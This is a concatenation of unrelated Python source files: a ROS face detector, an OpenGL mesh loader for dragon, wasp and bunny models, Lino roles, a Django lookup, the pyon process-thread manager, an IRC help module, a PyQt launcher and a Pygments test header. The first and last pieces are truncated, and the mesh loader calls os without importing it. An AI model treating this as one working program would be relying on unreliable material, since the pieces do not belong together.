        #  Finish computing the face_centroid by dividing by the
        #  number of faces found above.
        #
        face_centroid_x /= float(len(faces))
        face_centroid_y /= float(len(faces))
        #
        #  Lastly, if faces were detected, publish a PointStamped 
        #  message that contains the centroid values.
        #
        pt = Point(x = face_centroid_x, y = face_centroid_y, z = 0.0)
        pt_stamped = PointStamped(point = pt)
        coord_publisher.publish(pt_stamped)

    #
    #  Convert the opencv image back to a ROS image using the 
    #  cv_bridge.
    #
    newmsg = cv_bridge.cv_to_imgmsg(image, 'mono8')

    #
    #  Republish the image.  Note this image has boxes around 
    #  faces if faces were found.
    #
    publisher.publish(newmsg)

def listener(publisher, coord_publisher):
    rospy.init_node('face_detector', anonymous=True)
    #
    #  Load the haar cascade.  Note we get the 
    #  filename from the "classifier" parameter
    #  that is configured in the launch script.
    #
    cascadeFileName = rospy.get_param("~classifier")
    cascade = cv.Load(cascadeFileName)
    rospy.Subscriber("/stereo/left/image_rect", 
                     Image, 
                     lambda image: callback(publisher, coord_publisher, cascade, image))
    rospy.spin()

# This is called first.
if __name__ == '__main__':
    publisher = rospy.Publisher('face_view', Image)
    coord_publisher = rospy.Publisher('face_coords', PointStamped)
    listener(publisher, coord_publisher)

#! /usr/bin/env python
# -*- coding: utf-8 -*-

from __future__ import print_function

import urllib

from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *

from jp.ac.kyoto_su.aokilab.dragon.mvc.model import OpenGLModel
from jp.ac.kyoto_su.aokilab.dragon.mvc.view import *
from jp.ac.kyoto_su.aokilab.dragon.opengl.triangle import OpenGLTriangle
from jp.ac.kyoto_su.aokilab.dragon.opengl.polygon import OpenGLPolygon

TRACE = True
DEBUG = False

class DragonModel(OpenGLModel):
	"""ドラゴンのモデル。"""

	def __init__(self):
		"""ドラゴンのモデルのコンストラクタ。"""
		if TRACE: print(__name__), self.__init__.__doc__

		super(DragonModel, self).__init__()
		self._eye_point = [-5.5852450791872 , 3.07847342734 , 15.794105252496]
		self._sight_point = [0.27455347776413 , 0.20096999406815 , -0.11261999607086]
		self._up_vector = [0.1018574904194 , 0.98480906061847 , -0.14062775604137]
		self._fovy = self._default_fovy = 12.642721790235

		filename = os.path.join(os.getcwd(), 'dragon.txt')
		if os.path.exists(filename) and os.path.isfile(filename):
			pass
		else:
			url = 'http://www.cc.kyoto-su.ac.jp/~atsushi/Programs/Dragon/dragon.txt'
			urllib.urlretrieve(url, filename)

		with open(filename, "rU") as a_file:
			while True:
				a_string = a_file.readline()
				if len(a_string) == 0: break
				a_list = a_string.split()
				if len(a_list) == 0: continue
				first_string = a_list[0]
				if first_string == "number_of_vertexes":
					number_of_vertexes = int(a_list[1])
				if first_string == "number_of_triangles":
					number_of_triangles = int(a_list[1])
				if first_string == "end_header":
					get_tokens = (lambda file: file.readline().split())
					collection_of_vertexes = []
					for n_th in range(number_of_vertexes):
						a_list = get_tokens(a_file)
						a_vertex = map(float, a_list[0:3])
						collection_of_vertexes.append(a_vertex)
					index_to_vertex = (lambda index: collection_of_vertexes[index-1])
					for n_th in range(number_of_triangles):
						a_list = get_tokens(a_file)
						indexes = map(int, a_list[0:3])
						vertexes = map(index_to_vertex, indexes)
						a_tringle = OpenGLTriangle(*vertexes)
						self._display_object.append(a_tringle)

		return

	def default_window_title(self):
		"""ドラゴンのウィンドウのタイトル(ラベル)を応答する。"""
		if TRACE: print(__name__), self.default_window_title.__doc__

		return "Dragon"


class WaspModel(OpenGLModel):
	"""スズメバチのモデル。"""

	def __init__(self):
		"""スズメバチのモデルのコンストラクタ。"""
		if TRACE: print(__name__), self.__init__.__doc__

		super(WaspModel, self).__init__()
		self._eye_point = [-5.5852450791872 , 3.07847342734 , 15.794105252496]
		self._sight_point = [0.19825005531311 , 1.8530999422073 , -0.63795006275177]
		self._up_vector = [0.070077999093727 , 0.99630606032682 , -0.049631725731267]
		self._fovy = self._default_fovy = 41.480099231656

		filename = os.path.join(os.getcwd(), 'wasp.txt')
		if os.path.exists(filename) and os.path.isfile(filename):
			pass
		else:
			url = 'http://www.cc.kyoto-su.ac.jp/~atsushi/Programs/Wasp/wasp.txt'
			urllib.urlretrieve(url, filename)

		with open(filename, "rU") as a_file:
			while True:
				a_string = a_file.readline()
				if len(a_string) == 0: break
				a_list = a_string.split()
				if len(a_list) == 0: continue
				first_string = a_list[0]
				if first_string == "number_of_vertexes":
					number_of_vertexes = int(a_list[1])
				if first_string == "number_of_polygons":
					number_of_polygons = int(a_list[1])
				if first_string == "end_header":
					get_tokens = (lambda file: file.readline().split())
					collection_of_vertexes = []
					for n_th in range(number_of_vertexes):
						a_list = get_tokens(a_file)
						a_vertex = map(float, a_list[0:3])
						collection_of_vertexes.append(a_vertex)
					index_to_vertex = (lambda index: collection_of_vertexes[index-1])
					for n_th in range(number_of_polygons):
						a_list = get_tokens(a_file)
						number_of_indexes = int(a_list[0])
						index = number_of_indexes + 1
						indexes = map(int, a_list[1:index])
						vertexes = map(index_to_vertex, indexes)
						rgb_color = map(float, a_list[index:index+3])
						a_polygon = OpenGLPolygon(vertexes, rgb_color)
						self._display_object.append(a_polygon)

		return

	def default_view_class(self):
		"""スズメバチのモデルを表示するデフォルトのビューのクラスを応答する。"""
		if TRACE: print(__name__), self.default_view_class.__doc__

		return WaspView

	def default_window_title(self):
		"""スズメバチのウィンドウのタイトル(ラベル)を応答する。"""
		if TRACE: print(__name__), self.default_window_title.__doc__

		return "Wasp"


class BunnyModel(OpenGLModel):
	"""うさぎのモデル。"""

	def __init__(self):
		"""うさぎのモデルのコンストラクタ。"""
		if TRACE: print(__name__), self.__init__.__doc__

		super(BunnyModel, self).__init__()

		filename = os.path.join(os.getcwd(), 'bunny.ply')
		if os.path.exists(filename) and os.path.isfile(filename):
			pass
		else:
			url = 'http://www.cc.kyoto-su.ac.jp/~atsushi/Programs/Bunny/bunny.ply'
			urllib.urlretrieve(url, filename)

		with open(filename, "rU") as a_file:
			while True:
				a_string = a_file.readline()
				if len(a_string) == 0: break
				a_list = a_string.split()
				if len(a_list) == 0: continue
				first_string = a_list[0]
				if first_string == "element":
					second_string = a_list[1]
					if second_string == "vertex":
						number_of_vertexes = int(a_list[2])
					if second_string == "face":
						number_of_faces = int(a_list[2])
				if first_string == "end_header":
					get_tokens = (lambda file: file.readline().split())
					collection_of_vertexes = []
					for n_th in range(number_of_vertexes):
						a_list = get_tokens(a_file)
						a_vertex = map(float, a_list[0:3])
						collection_of_vertexes.append(a_vertex)
					index_to_vertex = (lambda index: collection_of_vertexes[index])
					for n_th in range(number_of_faces):
						a_list = get_tokens(a_file)
						indexes = map(int, a_list[1:4])
						vertexes = map(index_to_vertex, indexes)
						a_tringle = OpenGLTriangle(*vertexes)
						self._display_object.append(a_tringle)
				if first_string == "comment":
					second_string = a_list[1]
					if second_string == "eye_point_xyz":
						self._eye_point = map(float, a_list[2:5])
					if second_string == "sight_point_xyz":
						self._sight_point = map(float, a_list[2:5])
					if second_string == "up_vector_xyz":
						self._up_vector = map(float, a_list[2:5])
					if second_string == "zoom_height" and a_list[3] == "fovy":
						self._fovy = self._default_fovy = float(a_list[4])

		return

	def default_view_class(self):
		"""うさぎのモデルを表示するデフォルトのビューのクラスを応答する。"""
		if TRACE: print(__name__), self.default_view_class.__doc__

		return BunnyView

	def default_window_title(self):
		"""うさぎのウィンドウのタイトル(ラベル)を応答する。"""
		if TRACE: print(__name__), self.default_window_title.__doc__

		return "Stanford Bunny"

# end of file
# Copyright 2015-2017 Rumma & Ko Ltd
# License: BSD (see file COPYING for details)

from lino.core.roles import UserRole


class SimpleContactsUser(UserRole):
    pass
    
class ContactsUser(SimpleContactsUser):
    pass


class ContactsStaff(ContactsUser):
    pass


from django.db.models import Transform
from django.db.models import DateTimeField, TimeField
from django.utils.functional import cached_property


class TimeValue(Transform):
    lookup_name = 'time'
    function = 'time'

    def as_sql(self, compiler, connection):
        lhs, params = compiler.compile(self.lhs)
        return 'TIME({})'.format(lhs), params

    @cached_property
    def output_field(self):
        return TimeField()


DateTimeField.register_lookup(TimeValue)
#!/usr/bin/env python

__author__ = 'Adam R. Smith, Michael Meisinger, Dave Foster <dfoster@asascience.com>'

import threading
import traceback
import gevent
from gevent import greenlet, Timeout
from gevent.event import Event, AsyncResult
from gevent.queue import Queue

from pyon.core import MSG_HEADER_ACTOR
from pyon.core.bootstrap import CFG
from pyon.core.exception import IonException, ContainerError
from pyon.core.exception import Timeout as IonTimeout
from pyon.core.thread import PyonThreadManager, PyonThread, ThreadManager, PyonThreadTraceback, PyonHeartbeatError
from pyon.datastore.postgresql.pg_util import init_db_stats, get_db_stats, clear_db_stats
from pyon.ion.service import BaseService
from pyon.util.containers import get_ion_ts, get_ion_ts_millis
from pyon.util.log import log

STAT_INTERVAL_LENGTH = 60000  # Interval time for process saturation stats collection

stats_callback = None


class OperationInterruptedException(BaseException):
    """
    Interrupted exception. Used by external items timing out execution in the
    IonProcessThread's control thread.

    Derived from BaseException to specifically avoid try/except Exception blocks,
    such as in Publisher's publish_event.
    """
    pass


class IonProcessError(StandardError):
    pass


class IonProcessThread(PyonThread):
    """
    The control part of an ION process.
    """

    def __init__(self, target=None, listeners=None, name=None, service=None, cleanup_method=None,
                 heartbeat_secs=10, **kwargs):
        """
        Constructs the control part of an ION process.
        Used by the container's IonProcessThreadManager, as part of spawn_process.

        @param  target          A callable to run in the PyonThread. If None (typical), will use the target method
                                defined in this class.
        @param  listeners       A list of listening endpoints attached to this thread.
        @param  name            The name of this ION process.
        @param  service         An instance of the BaseService derived class which contains the business logic for
                                the ION process.
        @param  cleanup_method  An optional callable to run when the process is stopping. Runs after all other
                                notify_stop calls have run. Should take one param, this instance.
        @param  heartbeat_secs  Number of seconds to wait in between heartbeats.
        """
        self._startup_listeners = listeners or []
        self.listeners          = []
        self._listener_map      = {}
        self.name               = name
        self.service            = service
        self._cleanup_method    = cleanup_method

        self.thread_manager     = ThreadManager(failure_notify_callback=self._child_failed)  # bubbles up to main thread manager
        self._dead_children     = []        # save any dead children for forensics
        self._ctrl_thread       = None
        self._ctrl_queue        = Queue()
        self._ready_control     = Event()
        self._errors            = []
        self._ctrl_current      = None      # set to the AR generated by _routing_call when in the context of a call

        # processing vs idle time (ms)
        self._start_time        = None
        self._proc_time         = 0   # busy time since start
        self._proc_time_prior   = 0   # busy time at the beginning of the prior interval
        self._proc_time_prior2  = 0   # busy time at the beginning of 2 interval's ago
        self._proc_interval_num = 0   # interval num of last record

        # for heartbeats, used to detect stuck processes
        self._heartbeat_secs    = heartbeat_secs    # amount of time to wait between heartbeats
        self._heartbeat_stack   = None              # stacktrace of last heartbeat
        self._heartbeat_time    = None              # timestamp of heart beat last matching the current op
        self._heartbeat_op      = None              # last operation (by AR)
        self._heartbeat_count   = 0                 # number of times this operation has been seen consecutively

        self._log_call_exception = CFG.get_safe("container.process.log_exceptions", False)
        self._log_call_dbstats = CFG.get_safe("container.process.log_dbstats", False)
        self._warn_call_dbstmt_threshold = CFG.get_safe("container.process.warn_dbstmt_threshold", 0)

        PyonThread.__init__(self, target=target, **kwargs)

    def heartbeat(self):
        """
        Returns a 3-tuple indicating everything is ok.

        Should only be called after the process has been started.
        Checks the following:
            - All attached endpoints are alive + listening (this means ready)
            - The control flow greenlet is alive + listening or processing

        @return 3-tuple indicating (listeners ok, ctrl thread ok, heartbeat status). Use all on it for a
                boolean indication of success.
        """
        listeners_ok = True
        for l in self.listeners:
            if not (l in self._listener_map and not self._listener_map[l].proc.dead and l.get_ready_event().is_set()):
                listeners_ok = False

        ctrl_thread_ok = self._ctrl_thread.running

        # are we currently processing something?
        heartbeat_ok = True
        if self._ctrl_current is not None:
            st = traceback.extract_stack(self._ctrl_thread.proc.gr_frame)

            if self._ctrl_current == self._heartbeat_op:

                if st == self._heartbeat_stack:
                    self._heartbeat_count += 1  # we've seen this before! increment count

                    # we've been in this for the last X ticks, or it's been X seconds, fail this part of the heartbeat
                    if self._heartbeat_count > CFG.get_safe('container.timeout.heartbeat_proc_count_threshold', 30) or \
                       get_ion_ts_millis() - int(self._heartbeat_time) >= CFG.get_safe('container.timeout.heartbeat_proc_time_threshold', 30) * 1000:
                        heartbeat_ok = False
                else:
                    # it's made some progress
                    self._heartbeat_count = 1
                    self._heartbeat_stack = st
                    self._heartbeat_time  = get_ion_ts()
            else:
                self._heartbeat_op      = self._ctrl_current
                self._heartbeat_count   = 1
                self._heartbeat_time    = get_ion_ts()
                self._heartbeat_stack   = st

        else:
            self._heartbeat_op      = None
            self._heartbeat_count   = 0

        #log.debug("%s %s %s", listeners_ok, ctrl_thread_ok, heartbeat_ok)
        return (listeners_ok, ctrl_thread_ok, heartbeat_ok)

    @property
    def time_stats(self):
        """
        Returns a 5-tuple of (total time, idle time, processing time, time since prior interval start,
        busy since prior interval start), all in ms (int).
        """
        now = get_ion_ts_millis()
        running_time = now - self._start_time
        idle_time = running_time - self._proc_time

        cur_interval = now / STAT_INTERVAL_LENGTH
        now_since_prior = now - (cur_interval - 1) * STAT_INTERVAL_LENGTH

        if cur_interval == self._proc_interval_num:
            proc_time_since_prior = self._proc_time-self._proc_time_prior2
        elif cur_interval-1 == self._proc_interval_num:
            proc_time_since_prior = self._proc_time-self._proc_time_prior
        else:
            proc_time_since_prior = 0

        return (running_time, idle_time, self._proc_time, now_since_prior, proc_time_since_prior)

    def _child_failed(self, child):
        """
        Callback from gevent as set in the TheadManager, when a child greenlet fails.
        Kills the ION process main greenlet. This propagates the error up to the process supervisor.
        """
        # remove the child from the list of children (so we can shut down cleanly)
        for x in self.thread_manager.children:
            if x.proc == child:
                self.thread_manager.children.remove(x)
                break
        self._dead_children.append(child)

        # kill this process's main greenlet. This should be noticed by the container's proc manager
        self.proc.kill(child.exception)

    def add_endpoint(self, listener, activate=True):
        """
        Adds a listening endpoint to be managed by this ION process.

        Spawns the listen loop and sets the routing call to synchronize incoming messages
        here. If this process hasn't been started yet, adds it to the list of listeners
        to start on startup.
        @param activate  If True (default), start consuming from listener
        """
        if self.proc:
            listener.routing_call = self._routing_call

            if self.name:
                svc_name = "unnamed-service"
                if self.service is not None and hasattr(self.service, 'name'):
                    svc_name = self.service.name

                listen_thread_name = "%s-%s-listen-%s" % (svc_name, self.name, len(self.listeners)+1)
            else:
                listen_thread_name = "unknown-listener-%s" % (len(self.listeners)+1)

            listen_thread = self.thread_manager.spawn(listener.listen, thread_name=listen_thread_name, activate=activate)
            listen_thread.proc._glname = "ION Proc listener %s" % listen_thread_name
            self._listener_map[listener] = listen_thread
            self.listeners.append(listener)
        else:
            self._startup_listeners.append(listener)

    def remove_endpoint(self, listener):
        """
        Removes a listening endpoint from management by this ION process.

        If the endpoint is unknown to this ION process, raises an error.

        @return The PyonThread running the listen loop, if it exists. You are
                responsible for closing it when appropriate.
        """

        if listener in self.listeners:
            self.listeners.remove(listener)
            return self._listener_map.pop(listener)
        elif listener in self._startup_listeners:
            self._startup_listeners.remove(listener)
            return None
        else:
            raise IonProcessError("Cannot remove unrecognized listener: %s" % listener)

    def target(self, *args, **kwargs):
        """
        Entry point for the main process greenlet.
        Setup the base properties for this process (mainly the control thread).
        """
        if self.name:
            threading.current_thread().name = "%s-target" % self.name

        # start time
        self._start_time = get_ion_ts_millis()
        self._proc_interval_num = self._start_time / STAT_INTERVAL_LENGTH

        # spawn control flow loop
        self._ctrl_thread = self.thread_manager.spawn(self._control_flow)
        self._ctrl_thread.proc._glname = "ION Proc CL %s" % self.name

        # wait on control flow loop, heartbeating as appropriate
        while not self._ctrl_thread.ev_exit.wait(timeout=self._heartbeat_secs):
            hbst = self.heartbeat()

            if not all(hbst):
                log.warn("Heartbeat status for process %s returned %s", self, hbst)
                if self._heartbeat_stack is not None:
                    stack_out = "".join(traceback.format_list(self._heartbeat_stack))
                else:
                    stack_out = "N/A"

                #raise PyonHeartbeatError("Heartbeat failed: %s, stacktrace:\n%s" % (hbst, stack_out))
                log.warn("Heartbeat failed: %s, stacktrace:\n%s", hbst, stack_out)

        # this is almost a no-op as we don't fall out of the above loop without
        # exiting the ctrl_thread, but having this line here makes testing much easier.
        self._ctrl_thread.join()

    def _routing_call(self, call, context, *callargs, **callkwargs):
        """
        Endpoints call into here to synchronize across the entire IonProcess.

        Returns immediately with an AsyncResult that can be waited on. Calls
        are made by the loop in _control_flow. We pass in the calling greenlet so
        exceptions are raised in the correct context.

        @param  call        The call to be made within this ION processes' calling greenlet.
        @param  callargs    The keyword args to pass to the call.
        @param  context     Optional process-context (usually the headers of the incoming call) to be
                            set. Process-context is greenlet-local, and since we're crossing greenlet
                            boundaries, we must set it again in the ION process' calling greenlet.
        """
        ar = AsyncResult()

        if len(callargs) == 0 and len(callkwargs) == 0:
            log.trace("_routing_call got no arguments for the call %s, check your call's parameters", call)

        self._ctrl_queue.put((greenlet.getcurrent(), ar, call, callargs, callkwargs, context))
        return ar

    def has_pending_call(self, ar):
        """
        Returns true if the call (keyed by the AsyncResult returned by _routing_call) is still pending.
        """
        for _, qar, _, _, _, _ in self._ctrl_queue.queue:
            if qar == ar:
                return True

        return False

    def _cancel_pending_call(self, ar):
        """
        Cancels a pending call (keyed by the AsyncResult returend by _routing_call).

        @return True if the call was truly pending.
        """
        if self.has_pending_call(ar):
            ar.set(False)
            return True

        return False

    def _interrupt_control_thread(self):
        """
        Signal the control flow thread that it needs to abort processing, likely due to a timeout.
        """
        self._ctrl_thread.proc.kill(exception=OperationInterruptedException, block=False)

    def cancel_or_abort_call(self, ar):
        """
        Either cancels a future pending call, or aborts the current processing if the given AR is unset.

        The pending call is keyed by the AsyncResult returned by _routing_call.
        """
        if not self._cancel_pending_call(ar) and not ar.ready():
            self._interrupt_control_thread()

    def _control_flow(self):
        """
        Entry point for process control thread of execution.

        This method is run by the control greenlet for each ION process. Listeners attached
        to the process, either RPC Servers or Subscribers, synchronize calls to the process
        by placing call requests into the queue by calling _routing_call.

        This method blocks until there are calls to be made in the synchronized queue, and
        then calls from within this greenlet.  Any exception raised is caught and re-raised
        in the greenlet that originally scheduled the call.  If successful, the AsyncResult
        created at scheduling time is set with the result of the call.
        """
        svc_name = getattr(self.service, "name", "unnamed-service") if self.service else "unnamed-service"
        proc_id = getattr(self.service, "id", "unknown-pid") if self.service else "unknown-pid"
        if self.name:
            threading.current_thread().name = "%s-%s" % (svc_name, self.name)
        thread_base_name = threading.current_thread().name

        self._ready_control.set()

        for calltuple in self._ctrl_queue:
            calling_gl, ar, call, callargs, callkwargs, context = calltuple
            request_id = (context or {}).get("request-id", None)
            if request_id:
                threading.current_thread().name = thread_base_name + "-" + str(request_id)
            #log.debug("control_flow making call: %s %s %s (has context: %s)", call, callargs, callkwargs, context is not None)

            res = None
            start_proc_time = get_ion_ts_millis()
            self._record_proc_time(start_proc_time)

            # check context for expiration
            if context is not None and 'reply-by' in context:
                if start_proc_time >= int(context['reply-by']):
                    log.info("control_flow: attempting to process message already exceeding reply-by, ignore")

                    # raise a timeout in the calling thread to allow endpoints to continue processing
                    e = IonTimeout("Reply-by time has already occurred (reply-by: %s, op start time: %s)" % (context['reply-by'], start_proc_time))
                    calling_gl.kill(exception=e, block=False)

                    continue

            # If ar is set, means it is cancelled
            if ar.ready():
                log.info("control_flow: attempting to process message that has been cancelled, ignore")
                continue

            init_db_stats()
            try:
                # ******************************************************************
                # ****** THIS IS WHERE THE RPC OPERATION/SERVICE CALL IS MADE ******

                with self.service.push_context(context), \
                     self.service.container.context.push_context(context):
                    self._ctrl_current = ar
                    res = call(*callargs, **callkwargs)

                # ****** END CALL, EXCEPTION HANDLING FOLLOWS                 ******
                # ******************************************************************

            except OperationInterruptedException:
                # endpoint layer takes care of response as it's the one that caused this
                log.debug("Operation interrupted")
                pass

            except Exception as e:
                if self._log_call_exception:
                    log.exception("PROCESS exception: %s" % e.message)

                # Raise the exception in the calling greenlet.
                # Try decorating the args of the exception with the true traceback -
                # this should be reported by ThreadManager._child_failed
                exc = PyonThreadTraceback("IonProcessThread _control_flow caught an exception "
                                          "(call: %s, *args %s, **kwargs %s, context %s)\n"
                                          "True traceback captured by IonProcessThread' _control_flow:\n\n%s" % (
                                          call, callargs, callkwargs, context, traceback.format_exc()))
                e.args = e.args + (exc,)

                if isinstance(e, (TypeError, IonException)):
                    # Pass through known process exceptions, in particular IonException
                    calling_gl.kill(exception=e, block=False)
                else:
                    # Otherwise, wrap unknown, forward and hopefully we can continue on our way
                    self._errors.append((call, callargs, callkwargs, context, e, exc))

                    log.warn(exc)
                    log.warn("Attempting to continue...")

                    # Note: Too large exception string will crash the container (when passed on as msg header).
                    exception_str = str(exc)
                    if len(exception_str) > 10000:
                        exception_str = (
                            "Exception string representation too large. "
                            "Begin and end of the exception:\n"
                            + exception_str[:2000] + "\n...\n" + exception_str[-2000:]
                        )
                    calling_gl.kill(exception=ContainerError(exception_str), block=False)
            finally:
                try:
                    # Compute statistics
                    self._compute_proc_stats(start_proc_time)

                    db_stats = get_db_stats()
                    if db_stats:
                        if self._warn_call_dbstmt_threshold > 0 and db_stats.get("count.all", 0) >= self._warn_call_dbstmt_threshold:
                            stats_str = ", ".join("{}={}".format(k, db_stats[k]) for k in sorted(db_stats.keys()))
                            log.warn("PROC_OP '%s.%s' EXCEEDED DB THRESHOLD. stats=%s", svc_name, call.__name__, stats_str)
                        elif self._log_call_dbstats:
                            stats_str = ", ".join("{}={}".format(k, db_stats[k]) for k in sorted(db_stats.keys()))
                            log.info("PROC_OP '%s.%s' DB STATS: %s", svc_name, call.__name__, stats_str)
                    clear_db_stats()

                    if stats_callback:
                        stats_callback(proc_id=proc_id, proc_name=self.name, svc=svc_name, op=call.__name__,
                                       request_id=request_id, context=context,
                                       db_stats=db_stats, proc_stats=self.time_stats, result=res, exc=None)
                except Exception:
                    log.exception("Error computing process call stats")

                self._ctrl_current = None
                threading.current_thread().name = thread_base_name

            # Set response in AsyncEvent of caller (endpoint greenlet)
            ar.set(res)

    def _record_proc_time(self, cur_time):
        """ Keep the _proc_time of the prior and prior-prior intervals for stats computation
        """
        cur_interval = cur_time / STAT_INTERVAL_LENGTH
        if cur_interval == self._proc_interval_num:
            # We're still in the same interval - no update
            pass
        elif cur_interval-1 == self._proc_interval_num:
            # Record the stats from the prior interval
            self._proc_interval_num = cur_interval
            self._proc_time_prior2 = self._proc_time_prior
            self._proc_time_prior = self._proc_time
        elif cur_interval-1 > self._proc_interval_num:
            # We skipped an entire interval - everything is prior2
            self._proc_interval_num = cur_interval
            self._proc_time_prior2 = self._proc_time
            self._proc_time_prior = self._proc_time

    def _compute_proc_stats(self, start_proc_time):
        cur_time = get_ion_ts_millis()
        self._record_proc_time(cur_time)
        proc_time = cur_time - start_proc_time
        self._proc_time += proc_time

    def start_listeners(self):
        """
        Starts all listeners in managed greenlets.

        Usually called by the ProcManager, unless using IonProcess manually.
        """
        try:
            # disable normal error reporting, this method should only be called from startup
            self.thread_manager._failure_notify_callback = None

            # spawn all listeners in startup listeners (from initializer, or added later)
            for listener in self._startup_listeners:
                self.add_endpoint(listener)

            with Timeout(seconds=CFG.get_safe('container.messaging.timeout.start_listener', 30)):
                gevent.wait([x.get_ready_event() for x in self.listeners])

        except Timeout:

            # remove failed endpoints before reporting failure above
            for listener, proc in self._listener_map.iteritems():
                if proc.proc.dead:
                    log.info("removed dead listener: %s", listener)
                    self.listeners.remove(listener)
                    self.thread_manager.children.remove(proc)

            raise IonProcessError("start_listeners did not complete in expected time")

        finally:
            self.thread_manager._failure_notify_callback = self._child_failed

    def _notify_stop(self):
        """
        Called when the process is about to be shut down.

        Instructs all listeners to close, puts a StopIteration into the synchronized queue,
        and waits for the listeners to close and for the control queue to exit.
        """
        for listener in self.listeners:
            try:
                listener.close()
            except Exception as ex:
                tb = traceback.format_exc()
                log.warn("Could not close listener, attempting to ignore: %s\nTraceback:\n%s", ex, tb)

        self._ctrl_queue.put(StopIteration)

        # wait_children will join them and then get() them, which may raise an exception if any of them
        # died with an exception.
        self.thread_manager.wait_children(30)

        PyonThread._notify_stop(self)

        # run the cleanup method if we have one
        if self._cleanup_method is not None:
            try:
                self._cleanup_method(self)
            except Exception as ex:
                log.warn("Cleanup method error, attempting to ignore: %s\nTraceback: %s", ex, traceback.format_exc())

    def get_ready_event(self):
        """
        Returns an Event that is set when the control greenlet is up and running.
        """
        return self._ready_control


class IonProcessThreadManager(PyonThreadManager):

    def _create_thread(self, target=None, **kwargs):
        return IonProcessThread(target=target, heartbeat_secs=self.heartbeat_secs, **kwargs)


# ---------------------------------------------------------------------------------------------------
# Process type variants

class StandaloneProcess(BaseService):
    """
    A process is an ION process of type "standalone" that has an incoming messaging
    attachment for the process and operations as defined in a service YML.
    """
    process_type = "standalone"


class SimpleProcess(BaseService):
    """
    A simple process is an ION process of type "simple" that has no incoming messaging
    attachment.
    """
    process_type = "simple"


class ImmediateProcess(BaseService):
    """
    An immediate process is an ION process of type "immediate" that does its action in
    the on_init and on_start hooks, and that it terminated immediately after completion.
    Has no messaging attachment.
    """
    process_type = "immediate"


class StreamProcess(BaseService):
    """
    Base class for a stream process.
    Such a process handles a sequence of otherwise unconstrained messages, resulting from a
    subscription. There are no operations.
    """

    process_type = "stream_process"

    def call_process(self, message, stream_route, stream_id):
        """
        Handles pre-processing of packet and process work
        """
        self.process(message)

    def process(self, message):
        """
        Process a message as arriving based on a subscription.
        """
        pass


# ---------------------------------------------------------------------------------------------------
# Process helpers

def get_ion_actor_id(process):
    """Given an ION process, return the ion-actor-id from the context, if set and present"""
    ion_actor_id = None
    if process:
        ctx = process.get_context()
        ion_actor_id = ctx.get(MSG_HEADER_ACTOR, None) if ctx else None
    return ion_actor_id


def set_process_stats_callback(stats_cb):
    """ Sets a callback function (hook) to push stats after a process operation call. """
    global stats_callback
    if stats_cb is None:
        pass
    elif stats_callback:
        log.warn("Stats callback already defined")
    stats_callback = stats_cb

# Author: Nick Raptis <airscorp@gmail.com>
"""
Module for listing commands and help.
"""

from basemodule import BaseModule, BaseCommandContext

from alternatives import _

class HelpContext(BaseCommandContext):

    def cmd_list(self, argument):
        """List commands"""
        arg = argument.lower()
        index = self.bot.help_index
        public = "public commands  -- %s" % " ".join(index['public'])
        private = "private commands -- %s" % " ".join(index['private'])
        if 'all' in arg or 'both' in arg:
            output = "\n".join((public, private))
        elif 'pub' in arg or self.target.startswith('#'):
            output = public
        elif 'priv' in arg or not self.target.startswith('#'):
            output = private
        else:
            # we shouldn't be here
            self.logger.error("cmd_list")
            return
        self.send(self.target, output)

    def cmd_modules(self, argument):
        """List active modules"""
        index = self.bot.help_index
        output = "active modules   -- %s" % " ".join(index['modules'].keys())
        self.send(self.target, output)

    def cmd_help(self, argument):
        """Get help on a command or module"""
        arg = argument.lower()
        index = self.bot.help_index
        target = self.target
        args = arg.split()
        if not args:
            s = "usage: help <command> [public|private] / help module <module>"
            self.send(target, s)
        elif args[0] == 'module':
            args.pop(0)
            if not args:
                self.send(target, "usage: help module <module>")
            else:
                help_item = index['modules'].get(args[0])
                if help_item:
                    self.send(target, help_item['summary'])
                else:
                    self.send(target, _("No help for %s"), args[0])
        else:
            args.append("")
            cmd = args.pop(0)
            cmd_type = args.pop(0)
            if 'pu' in cmd_type or self.target.startswith('#'):
                cmd_type = 'public'
            elif 'pr' in cmd_type or not self.target.startswith('#'):
                cmd_type = 'private'
            else:
                # we shouldn't be here
                self.logger.error("cmd_list")
                return
            help_item = index[cmd_type].get(cmd)
            if help_item:
                self.send(target, index[cmd_type][cmd]['summary'])
            else:
                self.send(target, _("No help for %s"), cmd)


class HelpModule(BaseModule):
    context_class = HelpContext

module = HelpModule

#!/usr/bin/env python

#Copyright (c) <2015>, <Jaakko Leppakangas>
#All rights reserved.
#
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions are met: 
#
#1. Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer. 
#2. Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution. 
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#The views and conclusions contained in the software and documentation are those
#of the authors and should not be interpreted as representing official policies, 
#either expressed or implied, of the FreeBSD Project.

'''
Created on Dec 16, 2014

@author: Jaakko Leppakangas
'''
import sys
from PyQt4 import QtGui

from ui.preprocessDialog import PreprocessDialog

def main(): 
    app = QtGui.QApplication(sys.argv)
    window=PreprocessDialog()
    
    window.show()
    
    sys.exit(app.exec_())

if __name__ == '__main__':
    main()
    

# -*- coding: utf-8 -*-
"""
    Pygments HTML formatter tests
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    :copyright: Copyright 2006-2009 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
"""

import os
import re
import unittest
import StringIO
import tempfile
